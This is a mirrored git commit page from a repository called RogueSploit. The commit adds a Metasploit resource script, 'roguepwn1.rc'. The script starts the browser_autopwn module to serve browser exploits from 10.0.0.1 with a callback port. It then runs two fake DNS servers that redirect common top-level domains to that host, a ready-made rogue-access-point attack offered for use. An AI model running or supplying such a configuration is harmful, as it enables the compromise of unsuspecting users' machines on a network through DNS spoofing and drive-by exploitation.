mirror of
https://github.com/aljazceru/RogueSploit.git
synced 2025-12-17 06:14:21 +01:00
New rc file for Autopwn 1
This commit is contained in:
29
roguepwn1.rc
Normal file
29
roguepwn1.rc
Normal file
@@ -0,0 +1,29 @@
|
|||||||
|
use auxiliary/server/browser_autopwn
|
||||||
|
|
||||||
|
set AUTOPWN_HOST 10.0.0.1
|
||||||
|
set AUTOPWN_PORT 80
|
||||||
|
set AUTOPWN_URI /
|
||||||
|
set LPORT 45000
|
||||||
|
set SRVHOST 10.0.0.1
|
||||||
|
set SRVPORT 80
|
||||||
|
set URIPATH /
|
||||||
|
|
||||||
|
run -j
|
||||||
|
|
||||||
|
use auxiliary/server/fakedns
|
||||||
|
set LogConsole false
|
||||||
|
set TARGETHOST 10.0.0.1
|
||||||
|
set SRVHOST 10.0.0.1
|
||||||
|
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu. *.fr
|
||||||
|
set TARGET ACTION BYPASS
|
||||||
|
set SRVPORT 5353
|
||||||
|
run -j
|
||||||
|
|
||||||
|
use auxiliary/server/fakedns
|
||||||
|
set LogConsole false
|
||||||
|
set TARGETHOST 10.0.0.1
|
||||||
|
set SRVHOST 10.0.0.1
|
||||||
|
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
|
||||||
|
set TARGET ACTION BYPASS
|
||||||
|
set SRVPORT 53
|
||||||
|
run -j
|
||||||
Reference in New Issue
Block a user